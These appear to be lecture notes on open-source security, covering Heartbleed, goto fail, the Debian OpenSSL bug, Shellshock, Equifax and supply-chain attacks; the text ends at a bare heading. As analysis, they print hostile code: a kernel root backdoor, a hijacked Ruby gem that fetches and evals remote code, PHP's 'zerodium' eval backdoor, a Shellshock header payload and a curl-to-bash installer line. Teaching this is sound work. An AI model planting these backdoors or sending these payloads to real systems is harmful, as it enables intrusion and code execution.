Open-Source Security
    Is open source more secure because more people look at the code? Or less
      secure, because bad guys can look at the code and find bugs?
    This question has been debated for quite some time. For a while, so-called "fuzzing" techniques (generating semi-random input in the hope of triggering bugs) did work better when the source was available: the tester would examine the source and craft inputs until all the edge cases were triggered. The goal was to execute every part of the code.
    But then that changed: tools were developed that could achieve the same coverage given only the object code. At that point, having the source available was no longer a relative liability, and a large number of exploits against closed-source Windows started to appear.
    On the other hand, the truth is that not everybody looks at the
      code. In most cases, not very many do.
    TLS, for Transport Layer Security, is an encryption layer used above TCP
      (or UDP). It is what creates the 's' in https, for secure
      http.
    Three issues
    First, the software can have bugs. Perhaps this is more likely for Open
      Source because of fewer development resources, though that is hard to say.
    
    Second, repositories can be compromised. This, too, can happen with
      commercial software, but Open Source does seem to be at least a little
      more prone to this.
    Finally, it is easy for users to fall behind on upgrading. If you're
      installing an e-commerce package from Microsoft, then Microsoft will make
      sure it gets updated. However, if you're building your own e-commerce
      package from a dozen separate open-source projects, then it's your job to
      update them all. It's easy to forget.
    These issues completely ignore the question of how many users actually
      look at the code in their open-source packages, or whether it's easier to
      figure out vulns once you hear vaguely of a problem with a certain
      project. 
    It remains true that Open Source projects are easier to trust. Even
      software from Microsoft is often tracking you or selling you something.
    Debian OpenSSL bug
    At some point (probably 2006), Debian removed a couple of lines from the Debian copy of OpenSSL because the lines generated complaints from code-analysis software. Here's the code as of today, from boinc.berkeley.edu/android-boinc/libssl/crypto/rand/md_rand.c; the function is static void ssleay_rand_add(const void *buf, int num, double add). The call to MD_Update() is actually a macro:
    #define MD_Update(a,b,c)	EVP_DigestUpdate(a,b,c)
    
    The variable m is a message-digest context structure (note that the calls below pass its address, &m). Here is part of the code:
    	for (i=0; i<num; i+=MD_DIGEST_LENGTH)
		{
		j=(num-i);
		j=(j > MD_DIGEST_LENGTH)?MD_DIGEST_LENGTH:j;
		MD_Init(&m);
		MD_Update(&m,local_md,MD_DIGEST_LENGTH);
		k=(st_idx+j)-STATE_SIZE;
		if (k > 0)
			{
			MD_Update(&m,&(state[st_idx]),j-k);
			MD_Update(&m,&(state[0]),k);
			}
		else
			MD_Update(&m,&(state[st_idx]),j);
		/* DO NOT REMOVE THE FOLLOWING CALL TO MD_Update()! */
		MD_Update(&m,buf,j);
		/* We know that line may cause programs such as
		   purify and valgrind to complain about use of
		   uninitialized data.  The problem is not, it's
		   with the caller.  Removing that line will make
		   sure you get really bad randomness and thereby
		   other problems such as very insecure keys. */
		MD_Update(&m,(unsigned char *)&(md_c[0]),sizeof(md_c));
		MD_Final(&m,local_md);
		md_c[1]++;
		buf=(const char *)buf + j;
		for (k=0; k<j; k++)
			{
			/* Parallel threads may interfere with this,
			 * but always each byte of the new state is
			 * the XOR of some previous value of its
			 * and local_md (itermediate values may be lost).
			 * Alway using locking could hurt performance more
			 * than necessary given that conflicts occur only
			 * when the total seeding is longer than the random
			 * state. */
			state[st_idx++]^=local_md[k];
			if (st_idx >= STATE_SIZE)
				st_idx=0;
			}
		}
 
    
    The code-analysis software thought the repeated calls (this is inside a
      loop) to MD_Update(&m,buf,j) made use of uninitialized data.
      This may actually have been the case, in that perhaps some
      entropy was indeed supposed to come from the uninitialized data. The code
      does look odd, though, from a deterministic point of view.
      Still, the point of the repeated calls to MD_Update() was to generate
      additional randomness. 
    Commenting out the call to MD_Update(&m,buf,j) greatly reduced the total available entropy. Reportedly the only entropy remaining came from the process ID, essentially a 15-bit number (the default Linux PID limit was 32768). This really breaks the random-number generator.
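    To see why this is so catastrophic, here is a sketch (hypothetical code, not a real exploit; the helper functions named in the comments are made up): if the only varying input to the generator was the process ID, an attacker can simply enumerate all of the roughly 32,768 possible generator states, and the keys derived from them.
#include <stdio.h>

#define PID_MAX 32768            /* default Linux PID limit at the time */

int main(void) {
    int candidates = 0;
    for (int pid = 1; pid < PID_MAX; pid++) {
        /* seed_prng_with_pid(pid);        -- hypothetical helpers:       */
        /* generate_candidate_key();          re-run the broken PRNG      */
        /* compare_with_target_key();         and test the resulting key  */
        candidates++;
    }
    printf("only %d candidate keys to try per key type and size\n", candidates);
    return 0;
}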
    Debian discovered and fixed the error in 2008.
    Apple TLS bug
    Here is the source code (Apple has open-sourced a lot of OS X, but not
      the GUI parts of it):
    static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
	OSStatus        err;
	...
	if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
		goto fail;
	if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
		goto fail;
		goto fail;
	if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
		goto fail;
	...
	err = sslRawVerify();
	...
fail:
	SSLFreeBuffer(&signedHashes);
	SSLFreeBuffer(&hashCtx);
	return err;
}
    
    Note the duplicated "goto fail". Note also the lack of enclosing {}. Despite what the indentation suggests, the second goto fail is always executed, so the function always jumps to fail before SSLHashSHA1.final() and, more importantly, before sslRawVerify() is ever called. At that point err most likely still holds 0 (the return value of the last update() call, which succeeded), and so the exchange is treated as verified even if the server's signature did not match.
    It's times like this that it is really handy to have the compiler doing dead-code detection. Fail.
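    Here is a minimal standalone sketch of the same bug shape (my own illustration, not Apple's code); compiling it with warnings enabled (eg clang's -Wunreachable-code) should flag the dead check:
#include <stdio.h>

static int check1(void) { return 0; }        /* succeeds */
static int check2(void) { return 0; }        /* succeeds */
static int check3(void) { return -1; }       /* would have failed */

static int verify(void) {
    int err;
    if ((err = check1()) != 0)
        goto fail;
    if ((err = check2()) != 0)
        goto fail;
        goto fail;                           /* always executed, despite the indentation */
    if ((err = check3()) != 0)               /* dead code: never reached */
        goto fail;
fail:
    return err;                              /* err is still 0: "success" */
}

int main(void) {
    printf("verify() returned %d\n", verify());   /* prints 0 */
    return 0;
}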
    Ok, nobody was looking at the Apple source here outside of Apple.
    OpenSSL Heartbleed bug
    As the Debian and Apple issues above show, anyone can introduce TLS bugs.
      But the "heartbleed" bug was clearly related to the relatively modest
      development resources available to the OpenSSL foundation.
    Most servers used OpenSSL. TLS contains a heartbeat
      provision: the client sends occasional "heartbeat request" packets and the
      server is supposed to echo them back, exactly as is. This keeps the
      connection from timing out. That is, the client sends a (len,data)
      pair, and the server is supposed to echo back that much data. Part of the
      reason for echoing back data is so the client can figure out which request
      triggered a given response. It might make the most sense for the client
      request data to represent consecutive integers: "0", "1", ..., "10", "11",
      "12", ....
    The problem is that the client can lie: the client can send a request in
      which len ≠ data.length. If
      len < data.length,
      this is harmless; just the first len
      bytes of data get sent back.
      But what happens if len >
        data.length, and the server sends back len
      bytes? In this case the server would try to send too much back. In a
      sensible language, this would result in an array-bounds exception for
      data. In C, however, the result is the grabbing of a random chunk of
      memory beyond data. Suppose a sneaky client sent, say, a 3-byte payload, but declared the payload length (the value of len) as, say, 1000 bytes. The server then sends back 1000 bytes: the 3-byte payload followed by 997 bytes of whatever happened to lie in the heap just beyond it, which may contain interesting content. Unpredictable, but interesting.
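    Here is a minimal sketch of the over-read (my own illustration, not the OpenSSL code; the deliberate out-of-bounds read is undefined behavior in C, which is exactly the point):
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void) {
    char *secret  = strdup("SECRET KEY MATERIAL ELSEWHERE ON THE HEAP");
    char *payload = strdup("hi!");             /* the actual 3-byte payload */
    size_t declared_len = 40;                  /* the length the client claims */

    char *response = malloc(declared_len);
    memcpy(response, payload, declared_len);   /* reads far past the 4-byte allocation */
    fwrite(response, 1, declared_len, stdout); /* "echoes" back whatever followed payload */
    putchar('\n');

    free(response); free(payload); free(secret);
    return 0;
}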
    
    
    
    Here is the original code, from tls1_process_heartbeat(SSL * s). The
      variable payload represents
      the length of the heartbeat payload.
    n2s(p, payload);	// extract value of payload (the length)
pl = p;
...
if (hbtype == TLS1_HB_REQUEST) 
	{
	unsigned char *buffer, *bp;
	int r;
	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding
	 */
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;
	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);
	memcpy(bp, pl, payload);    // pld: copy payload bytes from pointer pl to pointer bp (=buffer, above)
	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);
	r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
	if (r >= 0 && s->msg_callback)		// pld: this will get moved
	      s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
	            buffer, 3 + payload + padding,
	            s, s->msg_callback_arg);
	OPENSSL_free(buffer);
	if (r < 0)
	      return r;
	}
    There is no check here that the value of payload, the declared
      length of the payload, matches the actual length of the payload.
      
      
    Here is the fix:
    if (hbtype == TLS1_HB_REQUEST) 
	{
	unsigned char *buffer, *bp;
	int r;
	/* Allocate memory for the response, size is 1 bytes
	 * message type, plus 2 bytes payload length, plus
	 * payload, plus padding
	 */
	buffer = OPENSSL_malloc(1 + 2 + payload + padding);
	bp = buffer;
	/* Enter response type, length and copy payload */
	*bp++ = TLS1_HB_RESPONSE;
	s2n(payload, bp);
	if (s->msg_callback)		// this got moved up, so it runs even if one of the returns below silently discards the request
	      s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT,
	            buffer, 3 + payload + padding,
	            s, s->msg_callback_arg);
	if (1+2+16 > s->s3->rrec.length)	// check that the record is big enough to hold even an empty payload plus padding
	      return 0;				// RFC 6520 section 4 says to silently discard
	if (1+2+payload+16 > s->s3->rrec.length)	// check whether the declared payload length exceeds the actual record length
	      return 0;				// silently discard
	memcpy(bp, pl, payload);    // copy payload bytes from pointer pl to pointer bp (=buffer, above); now safe
	bp += payload;
	/* Random padding */
	RAND_pseudo_bytes(bp, padding);
	r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding);
	OPENSSL_free(buffer);
	if (r < 0)
	      return r;
	}
    
    Google reported the bug to the OpenSSL Foundation on April 1, 2014. It is
      estimated that somewhere between 15 and 60% of sites using SSL were
      affected. 
    The bug is now fixed. Nobody knows how much it was exploited.
    The more interesting question might be why OpenSSL didn't get more attention earlier. There were people outside the OpenSSL Foundation looking at the code, but none of them noticed Heartbleed.
    Ultimately, the problem was that OpenSSL was severely underfunded. The president of the OpenSSL Foundation was (in 2014; he has since left) Steve Marquess. In a blog post after Heartbleed, he described himself as the fundraiser. The OpenSSL Foundation received about $2,000/year in donations, and also did some support consulting (the latter earned a good deal more).
    In the week after Heartbleed, the OpenSSL foundation received $9,000,
      mostly in small donations from individuals. Not from the big corporate
      users of OpenSSL.
    The foundation had one paid employee, Stephen Henson, who has a PhD in graph theory. He was not paid a lot. Before Steve M created the OpenSSL Foundation, Steve H's income was estimated at $20K/year. (The Heartbleed error was not his.)
    Despite the low level of funding, though, in the eight (or more) years
      before Heartbleed the OpenSSL Foundation was actively seeking
      certification under the NIST Cryptographic
        Module Validation Program. They understood completely that
      cryptography needs outsider audits.
    As of 2014, at least, the two Steves had never met face-to-face. Like
      Steve M, Steve Henson moved on to other projects in 2017.
    A month after the bug's announcement, the Linux Foundation announced that
      it was setting up the Core
        Infrastructure Initiative. They lined up backing from Google, IBM,
      Facebook, Intel, Amazon and Microsoft. The first project on the agenda was
      OpenSSL, and its struggle to gain certification from the US government.
    In 2015 a formal audit of OpenSSL was funded, by the Open Crypto Audit
      Project, opencryptoaudit.org.
      That audit has now been completed; a 2016 status report is at icmconference.org/wp-content/uploads/G12b-White.pdf.
    Here is a report of a later audit: ostif.org/the-ostif-and-quarkslab-audit-of-openssl-is-complete.
    As of 2016, Black Duck reported that 10% of the applications they tested
      were still vulnerable to Heartbleed, 1.5 years after the revelation (info.blackducksoftware.com/rs/872-OLS-526/images/OSSAReportFINAL.pdf).
      
    See also the Buzzfeed article "The
        internet is being protected by two guys named Steve".
    
    
    More Open-Source Security Issues
    Magento
    Magento is an e-commerce platform
      owned by Adobe. It is described as having an "open-source ecosystem". It is
      available on github at github.com/magento.
      I assume that is the "community edition"; there is also an "enterprise
      edition".
    A vulnerability was announced in April 2017 by DefenseCode LLC, six
      months after it was reported privately to Magento. Magento did not respond
      directly to DefenseCode. The vulnerability "could" lead to remote code
      execution, though there are some additional steps to get that to work, and
      it was not clear whether that actually happened in the wild. See www.defensecode.com/advisories/DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf.
    
    If a site adds a link to a product video stored remotely on Vimeo, the software automatically requests a preview image. If the file requested is not in fact an image file, Magento will log a warning message, but it will still download the file. The idea is to trick Magento into downloading an executable file, eg a .php file. An updated .htaccess file also needs to be downloaded, but once the basic file-download trick is working this is not difficult. Because downloaded files are apparently stored in subdirectories determined by the first characters of the filename, the .php file should have a name beginning with ".h", so that it lands in the same directory as the .htaccess file.
    Parts of the strategy also involve cross-site request forgeries (CSRF)
      against someone with Magento management privileges at the target site.
      Even low-level privileges are sufficient. There are numerous strategies
      for trying to get someone to click on a suitable link; none of them are
      sure bets.
    Magento's failure to respond more aggressively to DefenseCode was
      puzzling. This seems less likely in a "true" open-source project.
    As of 2018, Magento was still running into security issues, often related
      to brute-force attacks on administrative passwords, which were often not
      well-configured. Magento is an attractive target, as it is an e-commerce
      front-end, and as a result a large number of credit-card transactions flow
      through it.
    Also in 2018, open-source security firm Black Duck sold for half a
      billion. 
    Equifax 
    In August 2017 credit-reporting company Equifax discovered that personal records on roughly 140 million US people had been exfiltrated. The actual vulnerability was in Apache Struts 2, a framework for developing Java server-side web applications; it extends the Java Servlet API. Struts has a history of serious vulnerabilities. The vulnerability in question was CVE-2017-5638, which allows for remote code execution.
    Equifax was notified of the issue in March 2017. They looked, but could
      not find a place on their site where Struts was being used! The
      vulnerability went unpatched, even as it was being routinely exploited in
      the wild.
    Making sure tools and frameworks are updated is tedious work. Something like Struts can be buried in the archives of a project that was largely completed years ago. In Equifax's case, the vulnerable Struts installation turned out to be part of a very old web portal known as the Automated Consumer Interview System.
    In February 2020, the US Justice Department announced charges against four members of China's military who are believed to have carried out the attack.
    A more detailed analysis is at blog.0x7d0.dev/history/how-equifax-was-breached-in-2017.
      That report attributes the breach to these factors:
    
      
        - Insufficient knowledge of their legacy systems.
 
        - Poor password storage practices.
 
        - Lack of rigor in the patching process.
 
        - Lack of network segmentation.
 
        - Lack of a Host-Based Intrusion Detection System (HIDS).
 
        - Lack of alerting when security tools fail.
 
      
      Equifax was negligent, in that they missed some things, but it is hard
        to say they were glaringly negligent.
      The Chinese probably use the information to identify people who are
        under significant financial stress, and who may be vulnerable to
        bribery.
     
    
    Shellshock
    This is the bug in bash that allowed very easy remote code execution. It was discovered and fixed in 2014. The problem was that importing an environment variable -- normally a benign act -- could be tricked into executing a command as well, if the variable's value began with a shell function definition.
    The shell maintains the environment as a list of (name,value)
      pairs. Specifically, we can assign a variable, and export it into the environment, as follows:
    export FOO=here_is_my_string
    echo $FOO
    We can also assign shell functions, eg with
    FN() { echo hello;}
      (the space before "echo" is significant). Prior to Shellshock, an exported function (export -f FN) would be stored in the environment as the pair (FN, "() { echo hello;}"). (You can list bash functions with typeset -F, and see the entire environment with env.)
    The problem was that one could sneak a command in after the function definition inside an environment-variable value, and the command would be executed at the time a new bash process imported that variable. Suppose the environment contains the assignment
    FN='() { echo hello;}; echo "hello world!"'
    (The trailing echo command is not actually part of the function.) Due to a mistake in recognizing the end of the function body, older versions of bash parse this value as the function definition
    FN() { echo hello;}
    followed by the command echo "hello world!", and they execute that command.
    So whenever the environment containing this definition was passed to a new bash process, the 'echo "hello world!"' command would go along for the ride. The core problem occurs only with values that begin with '()'; normal shell-variable strings do not result in command execution. That is, assigning a variable FN2='echo "hello world"' would not result in executing the command; nor would FN3="foo"; echo "hello world" (though when typed at the prompt the FN3 example would echo "hello world" once, since the echo there is simply a separate command).
    This is most of the problem. The other part is that web servers, and
      quite a range of other software, routinely accept strings from clients
      that they then turn into environment variables. For example, if the client
      sends the following GET request to the server (from blog.cloudflare.com/inside-shellshock):
    GET / HTTP/1.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8,fr;q=0.6
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Host: cloudflare.com
    
    then the server turns it into the following environment
      settings (before executing the GET request):
    HTTP_ACCEPT_ENCODING=gzip,deflate,sdch
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.8,fr;q=0.6
HTTP_CACHE_CONTROL=no-cache
HTTP_PRAGMA=no-cache
HTTP_USER_AGENT=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
HTTP_HOST=cloudflare.com
    
    The server does this so that a CGI script on the server will have access to these values, through its environment. However, because of the bug, passing such an environment to bash can lead to code execution!
    Now suppose the client instead sent the following as its User-Agent header (not a normal browser string at all):
    User-Agent: () { :; }; /bin/eject
    
    Then the command /bin/eject would be executed on the server, as soon as bash was invoked with that environment (eg to run a CGI script). (As for the shell-function part, ":" is the bash null command; the legal function part is () { :; };.)
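    Here is a hypothetical sketch in C (handler.cgi and the exact server logic are made up) of how a web server hands the client's header string to bash; on a pre-patch bash, the trailing command runs as soon as bash imports HTTP_USER_AGENT:
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    /* the value the client supplied in its User-Agent header */
    const char *user_agent = "() { :; }; /bin/eject";

    /* the server exports the header for the benefit of the CGI script ... */
    setenv("HTTP_USER_AGENT", user_agent, 1);

    /* ... and then runs the script; a vulnerable bash parses HTTP_USER_AGENT
       as a function definition and executes the trailing /bin/eject */
    return system("/bin/bash ./handler.cgi");
}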
    
    A consequence of the patch is that bash functions are no longer imported from ordinary environment variables at all; exported functions now travel under specially encoded names (eg BASH_FUNC_FN%%), which can never collide with a normal variable. (Going this far wasn't strictly necessary, but it probably was a good idea.)
    Meltdown and Spectre
    The Meltdown and Spectre vulnerabilities affect Intel CPUs (Spectre affects other vendors' processors as well); Intel open-sources nothing about its processors. But open-source operating systems still had to create patches.
    The problem is that open-source patches had to be created while there was
      still a news embargo on the details of the vulnerability, lest miscreants
      get a leg up on exploiting them.
    Meltdown and Spectre were discovered in the summer of 2017 by Jann Horn of Google, Werner Haas and Thomas Prescher of Cyberus Technology, and Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz of Graz University of Technology. The discoverers informed Intel, and all agreed to announce the flaw only once there was a fix in place.
    In November 2017, Alex Ionescu noticed an upgrade to Windows 10 that made
      the CPU run slower, with no obvious benefit. He suspected this was a
      vulnerability patch.
    On Wednesday January 3, 2018, there were new commits to the Linux kernel.
      Observers quickly noticed that the commits didn't seem to make sense, from
      a performance perspective. Rampant speculation that they were related to a
      hardware vulnerability led to the announcement of Spectre and Meltdown on
      that date. The scheduled release/announcement date was to be January 9,
      Microsoft's "Patch Tuesday".
    Still, the Linux community by and large did abide by the embargo rules.
      This is complicated, because it means not using the public
      discussion system that has been put in place. It also means not
        releasing important security fixes until the embargo is ended.
    The head of OpenBSD, Theo de Raadt, was extremely vexed, as OpenBSD was not given advance warning: 
    Only Tier-1 companies received advance
      information, and that is not responsible disclosure – it is selective
      disclosure.... Everyone below Tier-1 has just gotten screwed.
    De Raadt also argued that, while Spectre might be considered an
      unforeseen bug, the issues behind Meltdown were long understood to at
      least some degree. Intel decided to go ahead with their
      speculative-execution design anyway, in order to beat the competition.
    OpenBSD did announce a fix before the end of the embargo for the Wi-Fi
      Krack vulnerability of October 2017. The theory at that time was that
      OpenBSD would therefore not be given advance warning of the next
      vulnerability. But several other smaller OS vendors (Joyent, SmartOS) also
      were not told about Meltdown/Spectre in advance.
    Still, there is a real problem: to abide by embargo rules means
        sitting on a fix, knowing your users might be being attacked. It
      means your source is, until the embargo ends, no longer "open".
    
    
    Windows Security
    Windows systems are quite hard to secure, partly because there are so
      many files that are not well-understood within the security community, and
      partly because of the registry.
    Licensing rules don't help. If you want to verify the SHA-3 checksum of every file, for example, you pretty much have to boot from a separate, known-clean boot medium; otherwise, malware that has made it into the kernel can make it appear that all files are unchanged. However, in Windows, a separate boot device technically requires a separate license, and in practice making a bootable Windows USB drive is not easy without paying for one.
    Cryptography Software
    It is certainly reasonable to think of commercial software as reliable.
      After all, one can read the reviews, and a company couldn't stay in
      business if it didn't keep its users happy. If the software doesn't work
      properly, won't users know?
    If the software is a word processor, and it keeps crashing, or failing to
      format text properly, the failure is obvious. If the software does complex
      engineering calculations, that's harder to detect, but usually users do at
      least a little testing of their own.
    But if closed-source software does encryption, it is almost impossible to verify that the encryption was done correctly. Just what random-number algorithm was used? Was the AES encryption done properly? (If it was not, the problem becomes very clear as soon as the software sends encrypted content to an independent decryption program; but often that is not how the software is used. Frequently the same program is used to encrypt files and later to decrypt them, in which case an algorithm with a security flaw is almost undetectable.) Was the encryption done first, followed by the authentication hash (HMAC), or was it the other way around? Doing the encryption first is much safer, as the HMAC is then computed over the ciphertext and so provides no information about whether brute-force decryption is on the right track.
    For reasons like this, some commercial encryption software is audited.
      But usually it is not. The bottom line is that commercial crypto is hard
      to trust.
    Sometimes open-source isn't audited either. But it's hard to find out.
      And even with OpenSSL, people outside the OpenSSL foundation were looking
      at the basics of encryption, to make sure it looked ok.
    Software Trust
    Whatever one can say about open-source reliability (which, in general, is
      comparable to commercial-software reliability), open source wins the trust
      issue hands down. Once upon a time, most software was trustworthy, in that
      you could be reasonably sure the software was not spying on you. Those
      days are gone. Most Android apps spy, to some degree or another, on the
      user. Microsoft Office appears not to, but Windows 10 sends quite a bit of
      information back to Microsoft (some of this can be disabled through
      careful configuration). 
    Spyware is almost unknown, however, in the open-source world. Ubuntu has a search feature that returns some information to Canonical, but that's reasonably up-front. Firefox often asks to send crash reports, but, again, that's done openly. The reasons open-source spyware is so rare are:
    
      - users intensely dislike it
 
      - it is usually easy to find, in the source code, any attempt to create a new network connection that exfiltrates data back to the mothership
 
    
    Ironically, "free" software that is not open-source is usually
      spyware: "if you're not paying for the product, you are the
      product". Most non-open-source browser add-ons, in particular, are
      spyware. Many Android apps are spyware; flashlight apps are notorious. 
    Open-source trust is not always quite straightforward. Firefox, for
      example, is the browser with the most privacy-protection features, hands
      down. A version of Firefox is the basis for the Tor browser. That said,
      many Firefox privacy features are disabled by default, because some
      commercial sources of Firefox funding have had concerns.
     
    SourceForge (and Gimp)
    SourceForge is a popular alternative to GitHub for open-source projects.
      GitHub makes money selling space for non-public projects (public projects
      are free). SourceForge sold banner advertisements, and in 2013 started a
      "bundleware" program in which a user who downloaded a program or source
      tree would optionally receive a second download. The second download was
      selected by default, though users could unselect it. SourceForge is often
      used to distribute binaries, so this bundleware issue was not
      easily avoided once the download started.
    The problem was that the second downloaded package, a paid installation,
      often involved malware. At a minimum, spyware was common. Another common
      feature was advertisements that were allowed to contain a large DOWNLOAD
      button.
    The Gimp project left SourceForge in 2013, but as of 2015 SourceForge was
      still distributing Gimp binaries (as an "abandoned" project), and bundling
      them with malware. This did not go over well with the Gimp team.
    How can an open-source project protect itself against malicious
      distribution? What happens when a project is completely abandoned? What
      happens when a project simply moves elsewhere?
    In 2016 the bundleware program was ended, as new owners took control.
    Generally speaking, the actual open-source repositories weren't usually
      tampered with, though the Gimp case might be an exception.
    Tampered or Trojaned Repositories
    These are also sometimes called software "supply chain" attacks.
    In 2003, the main Linux repository was still on BitKeeper, but the project maintained a separate mirror repository running CVS. One day a patch appeared in the CVS copy of the code for the wait4() system call:
    +       if ((options == (__WCLONE|__WALL)) && (current->uid = 0))
+                       retval = -EINVAL;
     
    That last '=' on the first line is an assignment, not a comparison: it sets uid to 0, which gives the calling process root privileges. (Inside kernel code, assigning to current->uid is perfectly legal.) And because the assignment evaluates to 0, the && condition is false, so the -EINVAL branch never runs and nothing visible happens; a process calling wait4() with the otherwise-nonsensical flag combination __WCLONE|__WALL simply and silently becomes root.
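    A tiny standalone illustration (not kernel code) of why the line is so easy to misread: the assignment makes the condition false, so the visible "error" branch never runs, but the side effect remains.
#include <stdio.h>

int main(void) {
    int uid = 1000;                /* stand-in for current->uid */
    int retval = 0;
    if ((1) && (uid = 0))          /* '=' assigns; the expression evaluates to 0 (false) */
        retval = -1;               /* never executed */
    printf("retval=%d uid=%d\n", retval, uid);   /* prints retval=0 uid=0 */
    return 0;
}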
    This patch never made it back to the main BitKeeper repo, and it was
      pretty obvious from the beginning as it was the only file on the CVS
      mirror that didn't have a link back to BitKeeper, but nobody knows how it
      got there. See lwn.net/Articles/57135.
    There was a break-in at kernel.org in 2011. It is not certain that no kernel files were briefly modified, though the rigorous checksumming process would have made that difficult. Donald Austin was arrested for the breach, in Florida, in 2016. 
    In 2012, a SourceForge mirror site was hacked, and the phpMyAdmin package
      was modified to contain malware.
    In June 2018, hackers took over a Gentoo mirror account on github and
      installed file-deleting malware. Gentoo suffered at least one earlier such
      attack, in 2010.
    In July 2018, three packages on the Arch User Repository were infected
      with malware, including acroread (Adobe Acrobat Reader). Acroread isn't
      open-source, but it's trivial to install a one-line attack in the
      installation script:    
       curl -s https://badware.ly/stuff.sh | bash &
    The AUR is not the same as the Arch distribution itself, but
      distinctions like this are sometimes hard to keep track of.
    In an Aug 7, 2018 blog post, Eric Holmes describes how he gained commit
      access to Homebrew using credentials he found on the site. See medium.com/@vesirin/how-i-gained-commit-access-to-homebrew-in-30-minutes-2ae314df03ab.
      Homebrew is a package manager for macs, though it also works well under
      Linux.
    I'm harvesting credit card numbers and passwords from your site. Here's
      how.
    This was a 2018 warning post by David Gilbertson (david-gilbertson.medium.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5),
      who was not actually doing this, but wanted to point out how
      easy it was. Gilbertson discusses several standard countermeasures, and
      describes how they are close to useless.
     
    Webmin
    There was also a 2018 attack on Webmin,
      a system-administration tool, in which password_change.cgi was modified.
      See www.webmin.com/exploit.html
      for details. The attack affected the code on the build server, but
      apparently not the Github repository. Still, the vulnerable code
      was widely distributed. Most users, for example, installed the Debian or
      RPM pre-compiled package.
    
    Ruby strong_password gem
    In June 2019 the Ruby strong_password gem (Ruby's term for a library), version 0.0.7, was hijacked. 
    See withatwist.dev/strong-password-rubygem-hijacked.html
    Here's the crucial code:
    Thread.new {
    loop {
      _!{
        sleep rand * 3333;
        eval(
          Net::HTTP.get(
            URI('https://pastebin.com/raw/xa456PFt')
          )
        )
      }
    }
  } if Rails.env[0] == "p"
    
     
    This:
    
      - starts a new thread
 
      - after sleeping a random interval of up to 3333 seconds (an hour is 3600 seconds)
 
      - retrieves code from pastebin.com
 
      - executes it
 
      - wrapped in an empty exception handler, so you won't see errors (pld:
        I'm not sure about this, but maybe _!
        does this)
 
      - only if Ruby is running in production mode (making
        it harder to observe via testing)
 
    
    Something similar happened in March 2019 with a different Ruby package: zdnet.com/article/backdoor-code-found-in-popular-bootstrap-sass-ruby-library.
    In both cases, the github.com source was unchanged; the distribution at
      rubygems.org was what was compromised.
    There were multiple related vulnerabilities discovered in August 2019: github.com/rubygems/rubygems.org/wiki/Gems-yanked-and-accounts-locked#19-aug-2019
    There's also the VestaCP admin interface, and a python package Colourama.
    
    Consider building from source for production versions!
    Decompress
    A vulnerability in the open-source file-compression utility decompress
      was discovered in 2020. The problem is that, while decompressing, it could
      overwrite files such as ../../../etc/passwd (or, for that matter,
      ./foo/bar/../../../../../etc/passwd). This is a very old idea, but it
      keeps coming up. It is surprisingly hard to validate legitimate relative
      paths.
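    A small sketch (a hypothetical filter of my own, not the decompress code) of why naive validation fails: rejecting absolute paths and a leading "../" still lets an embedded ".." walk out of the extraction directory.
#include <stdio.h>
#include <string.h>

/* reject absolute paths and names that start with "../" -- not good enough */
static int naive_ok(const char *name) {
    return name[0] != '/' && strncmp(name, "../", 3) != 0;
}

int main(void) {
    const char *tricky = "./foo/bar/../../../../../etc/passwd";
    printf("%s -> %s\n", tricky, naive_ok(tricky) ? "accepted (oops)" : "rejected");
    return 0;
}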
    PyYAML
    YAML is a data-serialization format, not unlike JSON. PyYAML unpacks YAML
      data. Alas, it could be tricked, in a bug discovered in 2020, into running
      arbitrary constructors (and thus arbitrary code) when deserializing data.
      (The pickle library, the standard Python serialization mechanism, had the
      same issue a few years earlier.)
    Lodash
    This is a javascript library that supports a range of common utility functions. It is used in some four million projects on Github alone. A vulnerability discovered in 2019 involved "prototype pollution": crafted input to the library's merge-style functions could add or modify properties on the standard Object prototype, which then affects every object in the application.
    Octopus
    The Octopus scanner was malware on Github that tried to infect other
      repositories, through the use of a Netbeans issue. It was discovered in
      Spring 2020. Once a Netbeans installation was infected, every .jar file
      built with that installation would also carry the infection. See securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain.
    Zerodium
    In March 2021 it was discovered that an update to PHP contained a
      backdoor. If a website used the compromised PHP, someone could execute
      arbitrary code through the use of the password "zerodium". The PHP code
      was on a private git server git.php.net. It looks like the server itself
      was compromised; the malicious code appeared to have been uploaded by two
      trusted PHP maintainers (who were not in fact involved).
    There is in fact a security company named Zerodium, but they were not
      related.
    The added code looked something like this (bleepingcomputer.com/news/security/phps-git-server-hacked-to-add-backdoors-to-php-source-code):
    convert_to_string(enc);
    if (strstr(Z_STRVAL_P(enc), "zerodium")) {
        zend_try {
            zend_eval_string(Z_STRVAL_P(enc)+8, NULL, "REMOVETHIS: sold to zerodium, mid 2017");
      
    The idea was that if the value of the (nonstandard) User-Agentt HTTP header began with "zerodium", then the rest of the string would be executed as PHP. The "REMOVETHIS" string is just what gets inserted in the logfiles.
    The Great Suspender
